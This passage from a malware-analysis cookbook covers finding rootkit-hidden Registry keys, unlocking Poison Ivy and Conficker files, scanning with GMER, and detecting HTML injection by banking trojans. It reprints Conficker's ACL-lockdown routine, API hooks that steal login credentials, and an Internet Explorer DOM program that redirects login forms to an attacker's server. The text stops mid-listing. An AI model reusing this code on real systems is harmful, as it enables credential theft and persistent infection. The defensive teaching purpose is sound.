    // open the extracted hive file; the offline Registry API

    // returns the error code directly

    DWORD rc = OROpenHive(argv[1], &OffHive);

    if (rc != ERROR_SUCCESS)

    {

        printf("[ERROR] Cannot open hive: %lu\n", rc);

        return -1;

    }

    // begin to enumerate from the root key and prepend

    // "HKEY_LOCAL_MACHINE\\Software" to all keys since that's

    // where they are located in the active system registry

    EnumerateKeys(OffHive, L"HKEY_LOCAL_MACHINE\\Software");

    ORCloseHive(OffHive);

    return 0;

}


When you run the program, you should see something like this:

C:\> offreg-example.exe software.bin






HKEY_LOCAL_MACHINE\Software\Adobe\Acrobat Reader

HKEY_LOCAL_MACHINE\Software\Adobe\Acrobat Reader\9.0

HKEY_LOCAL_MACHINE\Software\Adobe\Acrobat Reader\9.0\AdobeViewer




We have built the functionality for hidden Registry data into the same tsk-xview.exe application that we used in the previous recipe to find hidden files. Figure 10-2 shows an example of using tsk-xview.exe on a system infected with an early variant of the TDSS/TDL [13] rootkit. The –f flag asks the program to skip the file system analysis. You can also pass the –k flag, which will make tsk-xview.exe keep a copy of the extracted Registry hives rather than deleting them. This allows you to analyze the hives using other tools, such as the ones mentioned later in this chapter.

Figure 10-2: Detecting hidden Registry keys with TSK


The output indicates that HKEY_LOCAL_MACHINE\Software\4DW4R3c was accessible using the offline Registry API, but it could not be enumerated with the Windows API. The key has no values. On the other hand, HKEY_LOCAL_MACHINE\System\ControlSet001\Services\4DW4R3 is hidden and it contains four values related to the service’s configuration. The key has two subkeys, injector and modules, which are also not visible using the Windows API. The keys and values are hidden by a rootkit, which hooks NtEnumerateKey and NtEnumerateValueKey.




Forensic/Incident Response Grab Bag

When you’re out in the field responding to incidents or performing forensic investigations (heck, even at home just using your computer), you never know what you’re going to run into. This section is based on that fact and presents a few tools and techniques that don’t necessarily fit in any category, but can certainly be useful to you in various situations.

Recipe 10-4: Bypassing Poison Ivy’s Locked Files


You can find supporting material for this recipe on the companion DVD.

Hiding files and directories is sometimes more trouble than it’s worth. By hooking APIs or loading a driver that manipulates file system operations, the malware creates a whole slew of additional artifacts that can alert you to its presence. Thus, in an attempt to remain stealthy, the malware might end up having the exact opposite effect. There are other ways, besides using API hooks, that attackers can prevent you from copying or deleting the malware’s components. This recipe shows you how you can investigate and bypass Poison Ivy’s locked files from the command line without rebooting or shutting down.

How Poison Ivy Locks Files

Some variants of the Poison Ivy [14] trojan lock files by specifying a restrictive file-sharing mode. To understand how this works, look at the function prototype for the CreateFile API:


HANDLE WINAPI CreateFile(

  __in          LPCTSTR lpFileName,

  __in          DWORD dwDesiredAccess,

  __in          DWORD dwShareMode,

  __in          LPSECURITY_ATTRIBUTES lpSecurityAttributes,

  __in          DWORD dwCreationDisposition,

  __in          DWORD dwFlagsAndAttributes,

  __in          HANDLE hTemplateFile

);


The dwShareMode parameter specifies the desired sharing mode, which can be FILE_SHARE_DELETE, FILE_SHARE_READ, FILE_SHARE_WRITE, any combination of them, or none of them. To specify no sharing, you call CreateFile with a dwShareMode value of 0. If that call succeeds, it returns a handle to the file, and all subsequent calls to CreateFile (by any process) that request read, write, or delete access to the same file fail with a sharing violation until the “owning” process closes its handle.
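The sharing rule can be modeled in a few lines of portable C. This is only a sketch of the idea, not the kernel's actual implementation: the open_request type, the WANT_* access bits, and share_compatible are names invented for this illustration, and the model considers just two openers and the three share flags discussed above.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Share flags; the values match the FILE_SHARE_* constants in winnt.h. */
#define SHARE_READ    0x1u  /* FILE_SHARE_READ   */
#define SHARE_WRITE   0x2u  /* FILE_SHARE_WRITE  */
#define SHARE_DELETE  0x4u  /* FILE_SHARE_DELETE */

/* Hypothetical access bits for this model only. They are laid out so
   that each one lines up with the share flag that permits it. */
#define WANT_READ     0x1u
#define WANT_WRITE    0x2u
#define WANT_DELETE   0x4u

typedef struct {
    uint32_t access;  /* what this opener wants to do      */
    uint32_t share;   /* what it allows other openers to do */
} open_request;

/* Returns true if `next` may open a file that `first` already holds open. */
static bool share_compatible(open_request first, open_request next)
{
    /* The model only understands the three bits defined above. */
    assert(((first.access | next.access) & ~0x7u) == 0);

    /* The new opener may only request access that the first opener shares... */
    if (next.access & ~first.share)
        return false;

    /* ...and it must itself share whatever the first opener is doing. */
    if (first.access & ~next.share)
        return false;

    return true;
}
```

In this model, an opener that passes a share value of 0 blocks every later request for read, write, or delete access, no matter how permissive the later request's own share flags are.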

When Poison Ivy executes, it often copies itself to the system32 directory. In the example, it used the name toli.exe. Then it injects code into another process and opens a handle to toli.exe from within the injected process. Thus, the injected process issues a call to CreateFile such as the one shown in the following code:



HANDLE hFile = CreateFile("C:\\WINDOWS\\system32\\toli.exe",
                      GENERIC_READ,
                      0, // no file sharing
                      NULL,
                      OPEN_EXISTING,
                      0, NULL);

The symptom of such behavior is that you cannot copy toli.exe to another machine for analysis and you also cannot delete it to disinfect the machine. Here’s what you’ll likely see if you attempt either operation (the F: drive is a USB stick).

F:\>copy c:\windows\system32\toli.exe F:\toli-copy.exe
The process cannot access the file because it is being used by another process.
        0 file(s) copied.

F:\>del c:\windows\system32\toli.exe
The process cannot access the file because it is being used by another process.

If you encounter similar error messages on Windows, now you know why it happens. To bypass the restrictive sharing mode, first you need to figure out which process has the file locked. Process Explorer and Process Hacker both have options to search for a DLL or file handle by name. However, you might prefer to use a command-line tool (especially if you’re performing a remote investigation). The Sysinternals handle.exe tool is good for the job. Try it like this:

F:\>handle.exe toli

 Handle v3.42

Copyright (C) 1997-2008 Mark Russinovich

Sysinternals -

 explorer.exe       pid: 1592    204: C:\WINDOWS\system32\toli.exe  

As the output shows, Explorer with PID 1592 is the culprit. It has an open handle to toli.exe with handle value 204. Before you see how to get access to the file, let’s use a kernel debugger to figure out exactly what is preventing our access.
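If you script this step, keep in mind that handle.exe prints the PID in decimal and the handle value in hexadecimal. The following sketch parses a result line into its parts. It assumes the line layout shown above (newer versions of the tool may add columns), and the handle_hit type and parse_handle_line function are names made up for this example.

```c
#include <assert.h>
#include <stdio.h>

typedef struct {
    char          image[64];  /* process image name, e.g. explorer.exe */
    unsigned long pid;        /* printed in decimal by handle.exe      */
    unsigned long handle;     /* printed in hexadecimal by handle.exe  */
    char          path[260];  /* name of the object the handle refers to */
} handle_hit;

/* Parses one result line such as
     " explorer.exe   pid: 1592   204: C:\WINDOWS\system32\toli.exe"
   Returns 1 on success, or 0 if the line has a different shape
   (for example, the banner lines). Image names that contain spaces
   are not handled by this sketch. */
static int parse_handle_line(const char *line, handle_hit *hit)
{
    assert(line != NULL && hit != NULL);
    return sscanf(line, " %63s pid: %lu %lx: %259[^\r\n]",
                  hit->image, &hit->pid, &hit->handle, hit->path) == 4;
}
```

Because the handle field is read with %lx, the value 204 in the output above is stored as 0x204, which is the form you need when you pass the handle to other tools.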

Exploring the Handle with a Kernel Debugger

You won’t need to perform the following steps to copy or delete the locked file; we’re only showing this part so you can understand exactly why the current access attempts fail. For details on how to set up a kernel debugger, see Chapter 14.

1. The first two commands identify the Explorer process and switch into its context.

lkd> !process 0 0

PROCESS 82174278  SessionId: 0  Cid: 0638    Peb: 7ffdb000  

    ParentCid: 060c DirBase: 1215b000  ObjectTable: e1aae630  

    HandleCount: 532 Image: explorer.exe

 lkd> .process /p /r 82174278  

Implicit process is now 82174278

2. The next command prints details about the suspect handle within Explorer. You can see that the handle is to a File object, the object’s address is 82261028, and the object’s name is toli.exe.

lkd> !handle 204

Handle table at e10f2000 with 542 Entries in use

0204: Object: 82261028  GrantedAccess: 00120089 Entry: e1eb2408

Object: 82261028  Type: (823eb040) File

    ObjectHeader: 82261010 (old version)

        HandleCount: 1  PointerCount: 1

        Directory Object: 00000000  

        Name: \WINDOWS\system32\toli.exe {HarddiskVolume1}

3. Using the object’s address, you can apply the fields for a _FILE_OBJECT structure and see the effective sharing modes. As the last three fields in the output show, the SharedRead, SharedWrite, and SharedDelete values are all 0. This explains why you cannot currently access the file.

lkd> dt _FILE_OBJECT 82261028 


   +0x000 Type             : 5

   +0x002 Size             : 112

   +0x004 DeviceObject     : 0x823a1c08 _DEVICE_OBJECT

   +0x008 Vpb              : 0x823af130 _VPB

   +0x00c FsContext        : 0xe1e8e0d0 

   +0x010 FsContext2       : 0xe18c8a00 

   +0x014 SectionObjectPointer : 0x81e2667c 

   +0x018 PrivateCacheMap  : (null) 

   +0x01c FinalStatus      : 0

   +0x020 RelatedFileObject : (null) 

   +0x024 LockOperation    : 0 ''

   +0x025 DeletePending    : 0 ''

   +0x026 ReadAccess       : 0x1 ''

   +0x027 WriteAccess      : 0 ''

   +0x028 DeleteAccess     : 0 ''

   +0x029 SharedRead       : 0 ''

   +0x02a SharedWrite      : 0 ''

   +0x02b SharedDelete     : 0 ''
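The GrantedAccess value from step 2 (00120089) can be decoded in a similar spirit. The sketch below maps the bits of a file access mask to their names. The bit values are the standard ones from winnt.h, but the ACC_ prefix, the table, and the describe_access function are invented for this illustration, and the table covers only the most common file rights.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

typedef struct { uint32_t bit; const char *name; } access_name;

/* Common file access rights, in ascending bit order (values from winnt.h). */
static const access_name k_names[] = {
    { 0x00000001u, "FILE_READ_DATA" },
    { 0x00000002u, "FILE_WRITE_DATA" },
    { 0x00000004u, "FILE_APPEND_DATA" },
    { 0x00000008u, "FILE_READ_EA" },
    { 0x00000010u, "FILE_WRITE_EA" },
    { 0x00000020u, "FILE_EXECUTE" },
    { 0x00000080u, "FILE_READ_ATTRIBUTES" },
    { 0x00000100u, "FILE_WRITE_ATTRIBUTES" },
    { 0x00010000u, "DELETE" },
    { 0x00020000u, "READ_CONTROL" },
    { 0x00040000u, "WRITE_DAC" },
    { 0x00080000u, "WRITE_OWNER" },
    { 0x00100000u, "SYNCHRONIZE" },
};

/* Writes the names of the set bits into out, joined by '|', and
   returns the bits it could not name (unknown bits, or bits that
   did not fit in the buffer). */
static uint32_t describe_access(uint32_t mask, char *out, size_t out_len)
{
    size_t used = 0;

    assert(out != NULL && out_len > 0);
    out[0] = '\0';

    for (size_t i = 0; i < sizeof k_names / sizeof k_names[0]; i++) {
        if (!(mask & k_names[i].bit))
            continue;
        int n = snprintf(out + used, out_len - used, "%s%s",
                         used ? "|" : "", k_names[i].name);
        if (n < 0 || (size_t)n >= out_len - used)
            break;  /* buffer full; stop appending */
        used += (size_t)n;
        mask &= ~k_names[i].bit;
    }
    return mask;
}
```

For 0x00120089, the named bits are FILE_READ_DATA, FILE_READ_EA, FILE_READ_ATTRIBUTES, READ_CONTROL, and SYNCHRONIZE, which together make up FILE_GENERIC_READ. That agrees with the ReadAccess, WriteAccess, and DeleteAccess fields in the debugger output: the handle was opened for reading only.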


How to Bypass the Locked File

The following list summarizes the options available to you at this point if you need to copy or delete the locked file (both operations are referred to as access in the list).

·           Forcefully terminate Explorer and hope Poison Ivy doesn’t reinfect Explorer when it restarts. Then access the file.

·           Boot into safe mode and access the file before Poison Ivy starts.

·           Boot the computer using a live Linux CD, mount the Windows drive with read/write permissions, then access the file.

·           Use an anti-rootkit tool like GMER (see Recipe 10-6) to access the file.

The following code shows yet another technique that is useful because it doesn’t terminate any processes or require rebooting. It is also a command-line utility, so you can use it remotely via PsExec. The program calls DuplicateHandle with the DUPLICATE_CLOSE_SOURCE option, which closes the original handle in the owning process as it creates a duplicate in your process. Closing the duplicate then frees up the file for you to access as you wish.

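int _tmain(int argc, _TCHAR* argv[])
{
    if (argc != 3) {
        _tprintf(_T("Usage: %s <pid> <handle>\n"), argv[0]);
        return -1;
    }

    // Enable() is a helper (not shown here) that turns on
    // the named privilege in the current process token
    Enable(SE_DEBUG_NAME); // Enable debug privilege

    DWORD dwPid  = _tcstoul(argv[1], NULL, 0);
    DWORD dwHval = _tcstoul(argv[2], NULL, 0);

    HANDLE hDupHandle;
    BOOL bStatus = FALSE;

    HANDLE hProc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwPid);

    if (hProc != NULL) {
        // duplicate the remote handle into this process and
        // close the original in the owning process
        if (DuplicateHandle(hProc,
            (HANDLE)(ULONG_PTR)dwHval,
            GetCurrentProcess(),
            &hDupHandle,
            0, FALSE,
            DUPLICATE_CLOSE_SOURCE))
        {
            // close our copy, which was the last open handle
            if (CloseHandle(hDupHandle)) {
                bStatus = TRUE;
            }
        }
        CloseHandle(hProc);
    }

    if (!bStatus) {
        _tprintf(_T("Cannot close the remote handle!\n"));
    } else {
        _tprintf(_T("Remote handle close succeeded!\n"));
    }

    return 0;
}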


To use the program, you pass it the PID of the owning process (1592 for Explorer in this case) and the handle value for the object you want to access. The following commands show how it closes Explorer’s handle to toli.exe, which then allows you to copy it and/or delete it.

F:\>closehandle.exe 1592 0x204

Remote handle close succeeded!

 F:\>copy c:\windows\system32\toli.exe copy.exe

        1 file(s) copied.

 F:\>del c:\windows\system32\toli.exe

In conclusion, Poison Ivy uses a very simple trick to protect its components, but that is the beauty of it. Refusing to share files with other processes is both legitimate and ordinary, so anti-rootkit tools won’t flag it as suspicious. But it is still an effective way for malware to squeeze in a few moments of extra run-time on the victim system while an investigator figures out how to disable it.


Recipe 10-5: Bypassing Conficker’s File System ACL Restrictions


You can find supporting materials for this recipe on the companion DVD.

The infamous Conficker worm went one step further than Poison Ivy to prevent access to its files. It dropped a DLL into the system32 directory and then altered the file’s ACL (Access Control List) so that other processes could only execute it. Attempts to read from or write to the DLL were denied, even if made by a process running with administrative rights. This made it difficult to remove Conficker from infected machines and allowed the worm to evade some antivirus programs because they weren’t able to open the DLL in order to scan it.

To demonstrate the effect of Conficker’s ACL modifications, consider the following example. We made a copy of kernel32.dll and placed it in the root directory. This copy of kernel32.dll will simulate a Conficker binary in our example case. Using Sysinternals’ AccessChk [15] tool, you can print the effective permissions for the DLL:

C:\> copy C:\WINDOWS\system32\kernel32.dll test.dll

C:\> accesschk.exe -v test.dll

 Accesschk v4.23 - Reports effective permissions for securable objects

Copyright (C) 2006-2008 Mark Russinovich

Sysinternals -


  RW BUILTIN\Administrators




  RW JASONRESACC69\Administrator


  R  BUILTIN\Users









As you can see, administrators currently have full control over the file (FILE_ALL_ACCESS). In order to change the security, Conficker adds an ACE (Access Control Entry, which is an entry in an ACL) to the DLL by calling AddAccessAllowedAce. The trick with this API function is that it does not automatically preserve existing ACEs (it is up to the programmer to copy them), so the code that follows essentially replaces all existing ACEs with a single ACE. Because that single ACE grants only execute and synchronize rights, read and write access are implicitly denied to all users, including administrators. We reverse-engineered the code as it appeared in a Conficker binary.

void SetSecurity(LPTSTR szFile)
{
    SECURITY_DESCRIPTOR pSD;
    SID_IDENTIFIER_AUTHORITY SIDAuthWorld =
        SECURITY_WORLD_SID_AUTHORITY;
    PSID pEveryoneSID;
    PACL pAcl;
    DWORD nAclLength;
    int iRet = 0;

    // initialize the security descriptor
    if (!InitializeSecurityDescriptor(
            &pSD, SECURITY_DESCRIPTOR_REVISION)) {
        return;
    }

    // allocate a security identifier (SID) for the
    // "world" or "everyone" - a group that includes
    // all users on the system
    if (!AllocateAndInitializeSid(&SIDAuthWorld,
        1, SECURITY_WORLD_RID,
        0, 0, 0, 0, 0, 0, 0, &pEveryoneSID)) {
        return;
    }

    // allocate memory for the ACL
    nAclLength = GetLengthSid(pEveryoneSID) + 16;
    pAcl = (PACL) new char[nAclLength];

    if (pAcl) {
        InitializeAcl(pAcl, nAclLength, ACL_REVISION);

        // add the access control entry that allows
        // execution and synchronization on the object
        // (the exact mask is an assumption based on this
        // comment; it is not visible in the listing)
        AddAccessAllowedAce(pAcl, ACL_REVISION,
            FILE_EXECUTE | SYNCHRONIZE,
            pEveryoneSID);

        // associate the ACL with the security descriptor
        SetSecurityDescriptorDacl(&pSD, TRUE, pAcl, FALSE);

        // apply the new security settings to the file
        SetFileSecurity(szFile, DACL_SECURITY_INFORMATION, &pSD);

        delete[] pAcl;
    }

    FreeSid(pEveryoneSID);
}





After using the function to change the security settings for test.dll, you can check the effective permissions again to see how they changed:

C:\> accesschk.exe -v test.dll

 Accesschk v4.23 - Reports effective permissions for securable objects

Copyright (C) 2006-2008 Mark Russinovich

Sysinternals -


  R  Everyone




At this point, processes can load the DLL for execution, but they cannot read from or write to it. You can verify this by attempting to read with more and write with echo, and then executing the DLL with rundll32. The parameters we passed to tasklist identify any processes with a loaded module named test.dll—this verifies that rundll32 can execute the DLL.

C:\> more < test.dll 

Access denied

 C:\> echo 1 > test.dll

Access denied 

 C:\> rundll32 test.dll,Sleep 10000

C:\> tasklist /FI "MODULES eq test.dll"

 Image Name               PID Session Name     Session#  Mem Usage

===================== ====== ================ ======== ==========

rundll32.exe            2080 Console                 0    3,164 K

Bypassing ACLs with Backup Semantics

One technique you can use to get access to the protected file without rebooting or powering down is to use backup semantics. To do this, you create a program that passes the FILE_FLAG_BACKUP_SEMANTICS flag in the dwFlagsAndAttributes argument to CreateFile. This special flag indicates that your process is requesting access to the file for backup or restoration purposes. For this to work, your process must first enable the SE_BACKUP_NAME privilege (for read access) and the SE_RESTORE_NAME privilege (for write access). As a result of these actions, your process gains super user access to the protected file, even if the ACL normally denies access. Here is an example:

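// all arguments except the file name and
// FILE_FLAG_BACKUP_SEMANTICS are assumptions; request
// GENERIC_WRITE as well if you need to write
HANDLE hFile = CreateFile("c:\\test.dll",
                      GENERIC_READ,
                      FILE_SHARE_READ,
                      NULL,
                      OPEN_EXISTING,
                      FILE_FLAG_BACKUP_SEMANTICS,
                      NULL);

if (hFile != INVALID_HANDLE_VALUE) {
    //ReadFile or WriteFile here
    CloseHandle(hFile);
}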



So you can use this method to bypass Conficker’s ACL modifications, but with one caveat—you still can’t write to the DLL as long as it’s loaded into a process. At this point, however, it’s not an ACL issue anymore; it is a DLL reference issue. What you need to do is either terminate the infected process or force it to unload the DLL. Process Hacker allows you to unload DLLs from a process, or you can create your own tool that calls FreeLibrary remotely (see Recipe 13-4). However, unloading a DLL in one of these manners is risky and could crash the process.

Bypassing ACLs with cacls.exe

Another option you can consider involves the cacls.exe utility supplied with Windows (or xcacls.exe) [16]. Using these tools, you can change ACLs from the command line to revert the changes that Conficker made to its DLL. In particular, you can remove execute rights for all users, and then reboot the infected machine. Upon rebooting, the malware won’t be able to start running and you can successfully copy and/or delete the DLL. You can follow these steps:

1. Check the existing access. This should reflect something similar to what accesschk.exe shows.

C:\>cacls test.dll

test.dll Everyone:(special access:)



2. Remove all access from the Everyone user.

C:\>cacls test.dll /E /R Everyone

processed file: C:\test.dll

3. Add read capabilities to the Administrator user (do not add execute).

C:\>cacls test.dll /E /G Administrator:R

processed file: C:\test.dll

4. Check the existing access again to make sure your changes were successful.

C:\>cacls test.dll

C:\test.dll JASONRESACC69\Administrator:R

5. Now you can reboot the computer and the DLL will not activate, since it is no longer executable.



Recipe 10-6: Scanning for Rootkits with GMER

GMER [17] is a powerful standalone rootkit detection and removal tool. The tool currently works on Windows NT, 2000, XP, and Vista, and it is able to detect the majority of the rootkits that are in the wild. Unfortunately, there’s no command-line interface to GMER, but that’s not a major drawback, considering its capabilities. Here is a summary of what it scans for:

·           Hidden processes, hidden DLLs, hidden threads, hidden kernel drivers, hidden services, hidden files, and hidden Registry keys

·           Alternate data streams

·           Import Address Table (IAT) hooks, Export Address Table (EAT) hooks, and inline hooks

·           System Service Dispatch Table (SSDT) hooks

·           Interrupt Descriptor Table (IDT) hooks

·           Hooked I/O Request Packet (IRP) routines in kernel drivers

·           Suspicious modifications of the Master Boot Record (MBR)

·           Suspicious layered drivers or attached devices

·           Drivers whose entry points land in suspicious PE sections, such as the .rsrc section. This indicates a rootkit may have patched the driver on disk.

·           Processes with mismatched section permissions (for example, an executable .rdata section)

Scanning with GMER

Figure 10-3 shows GMER’s GUI. You can right-click entries in the list of results to terminate suspicious processes, disable or delete services, and restore hooked SSDT entries.

Figure 10-3: Scanning a system for rootkits with GMER


Based on the output, you can draw the following conclusions:

·           The malware has installed IAT hooks.

    ·           GMER shows the alg.exe process (PID 2324) is infected, but most likely, other processes that you can’t see in the image are also infected.

    ·           The malware modifies the IAT of all modules loaded in alg.exe, including ole32.dll, WS2HELP.dll, SHELL32.dll, SHLWAPI.dll, and wininet.dll.

    ·           The API functions hooked within these modules include GetClipboardData (for stealing clipboard contents), TranslateMessage (for stealing keystrokes), and NtQueryDirectoryFile (for hiding files).

    ·           The Value field indicates where calls to the hooked API functions are redirected. All values are within the range 00A1???? – 00AA????. Therefore, you can expect to find the rootkit code at those addresses in the memory of alg.exe.

·           The malware has installed a kernel driver.

    ·           It exploited Windows’ layered driver architecture and loaded a malicious driver into the TCP/IP stack.

    ·           The rootkit can monitor traffic, redirect connections, or hide backdoor connections to the victim machine.

    ·           The name of the malicious driver is windev-36cb-75e3.sys.

·           The malware is hiding a service.

    ·           The hidden service has the same name as the malicious driver, so you know the two are related.

    ·           You can click on the hidden entry and disable or delete the service.

·           The malware is hiding Registry keys.

    ·           The data that is hidden actually contains the hidden service’s configuration.

Using GMER to Explore

If you click the Files tab in GMER, you can browse through the file system at a lower level than Windows Explorer. Thus, you can see files that rootkits typically hide from Explorer and other applications that run in user mode. Of course, it may be possible to also hide from GMER, but the driver that GMER loads to access the file system ensures that you have a very good chance of finding hidden files if they exist. Figure 10-4 shows an example of the file system browser. We selected the Only hidden box and navigated to the system32 directory, which quickly narrowed down the results to four malicious files. From here, you can either copy the files to another location (like a USB drive) or delete them.

Figure 10-4: Finding and deleting hidden files


GMER’s Registry tab allows you to browse through the Registry in a similar manner to Regedit. However, using GMER, you can see keys and values that are hidden by rootkits or that you simply don’t have permission to view in normal situations (such as the SAM or protected storage system provider keys). As with files on the file system, GMER highlights hidden Registry keys in red so you can tell them apart from everything else. Figure 10-5 shows how you can edit the data for a hidden value in order to disable automatically starting programs.

Figure 10-5: Finding and deleting hidden Registry keys


The following list identifies a few other anti-rootkit tools that you can use to explore how malware alters a system. Some of the tools do not have a dedicated website or may no longer be supported, but they all have very powerful rootkit detection capabilities.

·           Rootkit Unhooker [18]

·           IceSword [19]

·           Kernel Detective [20]

·           XueTr [21]

·           RootRepeal [22]







Recipe 10-7: Detecting HTML Injection by Inspecting IE’s DOM


You can find supporting material for this recipe on the companion DVD.

HTML injection is a common attack carried out by banking trojans such as Silent Banker, Limbo, and Zeus. This recipe presents multiple methods of performing HTML injection, describes how each method works, and shows how you can detect the presence of HTML-injecting malware on a computer.

HTML Injection

The point of an HTML injection attack is to insert extra fields into a user’s browser when he or she visits a login page (usually for a banking site, social networking site, or webmail site). To the end user, the extra fields appear legitimate because they blend in with the rest of the login form. Consider the two images in Figure 10-6, for example. The image on the left is from a clean system and the image on the right is from an infected system. The extra field requests a user’s PIN, which to some users may not seem out of the ordinary, especially if their financial institution is asking over an SSL-protected connection. After a user fills out the form and clicks Go, the malware extracts the credentials from the page along with the additional PIN.

Figure 10-6: HTML injection attacks trick users into entering extra information


Note: HTML injection does not always produce a visual change on the target website, as portrayed in Figure 10-6. In the DOM modification example later in this recipe, it just replaces the HTML form action so that the browser sends credentials to an attacker’s server instead.

HTML Injection with MITM

HTML injection can be done with a traditional MITM (man-in-the-middle) attack, where a malicious host positions itself on the network between the web server and the victim’s computer. This position enables the attacker to replace or insert data into the server’s response before it reaches the victim. Because of the complexities involving SSL and the need for a privileged vantage point on the network, the traditional MITM attack is the least common method. The two more prevalent methods are API hooking and IE DOM modification.

HTML Injection with API Hooking

Recipe 9-8 explained how you can create DLLs that hook API functions. This is similar in concept to what malware authors use to hook APIs, except they use different hooking libraries. The usual suspects in terms of which functions to hook are InternetReadFile and HttpSendRequest. Internet Explorer calls InternetReadFile to fetch a specified number of bytes from the server’s reply and then displays it in the browser. Thus, by hooking this function, malware can alter the reply before it is presented to the user.

In the other direction, HttpSendRequest sends a request containing an optional POST payload to the web server. By hooking this function, malware can extract credentials from the POST payload. It doesn’t matter if a user visits the HTTPS (SSL-protected) version of a login page because InternetReadFile receives data after decryption and HttpSendRequest receives data before encryption. Therefore, the malware can see everything in the clear. The code that follows shows an example of how malware utilizes API hooks to perform HTML injection.

BOOL Hook_InternetReadFile(
  __in   HINTERNET hFile,
  __out  LPVOID lpBuffer,
  __in   DWORD dwNumberOfBytesToRead,
  __out  LPDWORD lpdwNumberOfBytesRead)
{
    // call the real function first
    BOOL bRet = True_InternetReadFile(
                    hFile,
                    lpBuffer,
                    dwNumberOfBytesToRead,
                    lpdwNumberOfBytesRead);

    // save the error code so the hook stays
    // transparent to the caller
    DWORD dwErr = GetLastError();

    // is the user visiting a targeted site?
    if (IsTarget(hFile)) {
        // we don't actually define this function, but
        // theoretically it modifies data in the lpBuffer
        // value (pointer to HTTP/HTTPS reply) and then
        // fixes up the lpdwNumberOfBytesRead value to
        // reflect any changes in the buffer's size
        // (ModifyReply is a placeholder name)
        ModifyReply(lpBuffer, lpdwNumberOfBytesRead);
    }

    SetLastError(dwErr);
    return bRet;
}

BOOL Hook_HttpSendRequestA(
  __in  HINTERNET hRequest,
  __in  LPCSTR lpszHeaders,
  __in  DWORD dwHeadersLength,
  __in  LPVOID lpOptional,
  __in  DWORD dwOptionalLength)
{
    if (IsTarget(hRequest) &&   // visiting a targeted site?
        lpOptional != NULL &&   // a POST payload exists
        dwOptionalLength > 0)   // and it is not empty
    {
        // we don't actually define this function, but
        // theoretically it scans the POST payload for
        // the user's login name, password, and answers
        // to any extra fields inserted into the page
        // by the InternetReadFile hook. it will optionally
        // allocate a new buffer for the lpOptional data
        // that doesn't contain the extra fields before
        // calling the real HttpSendRequestA function so
        // that the legit web server doesn't see extraneous
        // fields, which could indicate HTML injection
        // (ScanPostPayload is a placeholder name)
        ScanPostPayload(&lpOptional, &dwOptionalLength);
    }

    // call the real function
    return True_HttpSendRequestA(
               hRequest,
               lpszHeaders,
               dwHeadersLength,
               lpOptional,
               dwOptionalLength);
}







HTML Injection with IE DOM Modification

Internet Explorer’s DOM (Document Object Model) is commonly exploited by malware for many purposes. As you might have guessed, HTML injection is one of those purposes. You can think of the DOM as a collection of elements that make up a web page. Each element of the page, such as an individual link, form, anchor, text box, or table, can be manipulated using special interfaces. After “connecting” to the DOM of a given browser instance (discussed in just a moment), the malicious code can do things like monitor all URLs the user visits, force the browser to POST data to an attacker-controlled site, and remove columns from HTML tables to hide transactions on online balance statements.

The two interfaces that are most relevant to manipulating the DOM are IWebBrowser2 [23] and IHTMLDocument2 [24]. Malware can access these interfaces by loading a DLL into Internet Explorer (for example, as a Browser Helper Object) or from a separate process that does not need to inject code into IE. To demonstrate how it all works, we created a simple login page using the following HTML and placed it on a test web server (the 1234 in its address is just an example):

<table width="300" align="center">
<tr>
<form method="POST" action="checklogin.php">
<td>
<table width="100%">
<tr>
<td colspan="2"><b>Member Login</b></td>
</tr>
<tr>
<td><input name="user" type="text"></td>
</tr>
<tr>
<td><input name="pass" type="text"></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="Submit" value="Login"></td>
</tr>
</table>
</td>
</form>
</tr>
</table>







As you can see, the form’s method is POST and its action is checklogin.php. An attacker may want to override the form’s action so that the browser sends credentials to an attacker-controlled site when the user clicks the Login button. The following code shows one method of accomplishing this task. Once active on a victim’s machine, the program waits for the user to visit the target login page and then drills down to the form element using the DOM interfaces. It changes the form action to a URL on the attacker’s server, which completes the injection.

BOOL IsReadyTarget(IWebBrowser2 *browser);
BOOL ReplaceForms(IHTMLDocument2 *doc);

int main(void)
{
    HRESULT hr;
    IShellWindows *shell;
    IDispatch *folder;
    IDispatch *html;
    IWebBrowser2 *browser;
    IHTMLDocument2 *doc;
    LONG Count;
    VARIANT vIndex;
    BOOL bDone = FALSE;
    DWORD dwFlags = CLSCTX_ALL;

    CoInitialize(NULL);

    // wait forever until the user visits a target page
    while(1) {

        // get a pointer to IShellWindows interface
        hr = CoCreateInstance(CLSID_ShellWindows,
            NULL, dwFlags,
            IID_IShellWindows, (void **)&shell);

        if (hr != S_OK) {
            printf("CoCreateInstance failed: 0x%x!\n", hr);
            break;
        }

        // loop through all existing windows
        Count = 0;
        shell->get_Count(&Count);

        for(int i=0; i<Count; i++)
        {
            folder = NULL; browser = NULL;
            html = NULL; doc = NULL;

            VariantInit(&vIndex);
            vIndex.vt = VT_I4;
            vIndex.lVal = i;

            hr = shell->Item(vIndex, (IDispatch **)&folder);
            if (hr != S_OK || !folder) {
                continue;
            }

            // try to get an IWebBrowser2 interface
            hr = folder->QueryInterface(IID_IWebBrowser2,
                                       (void **)&browser);
            if (hr != S_OK || !browser) {
                folder->Release();
                continue;
            }

            // if the user visited a target page, wait for it to
            // finish loading, derive an IHTMLDocument2 interface
            // from the browser, then attempt the HTML injection.
            if (IsReadyTarget(browser)) {
                hr = browser->get_Document((IDispatch**)&html);
                if (hr == S_OK && html) {
                    hr = html->QueryInterface(IID_IHTMLDocument2,
                                              (void **)&doc);
                    if (hr == S_OK && doc) {
                        bDone = ReplaceForms(doc);
                        doc->Release();
                    }
                    html->Release();
                }
            }

            browser->Release();
            folder->Release();
        }

        shell->Release();

        // if we succeeded, exit the loop
        if (bDone) break;

        // otherwise pause briefly before checking again
        Sleep(1000);
    }

    CoUninitialize();
    return 0;
}

// this function returns true if the user visited
// a target website and if the page is done loading
BOOL IsReadyTarget(IWebBrowser2 *browser)
{
    HRESULT      hr;
    VARIANT_BOOL vBool;
    BSTR         bstrUrl;
    BOOL         bRet = FALSE;
    LPCWSTR szTarget = L"";   // URL of the targeted login page

    // we only care about visible browsers
    hr = browser->get_Visible(&vBool);
    if (hr != S_OK || !vBool)
        return FALSE;

    // get the visited URL
    hr = browser->get_LocationURL(&bstrUrl);
    if (hr != S_OK || !bstrUrl)
        return FALSE;

    // check the URL and wait for it to load
    if (wcsstr((LPCWSTR)bstrUrl, szTarget) != NULL) {
        do {
            Sleep(100);
            hr = browser->get_Busy(&vBool);
        } while (hr == S_OK && vBool);
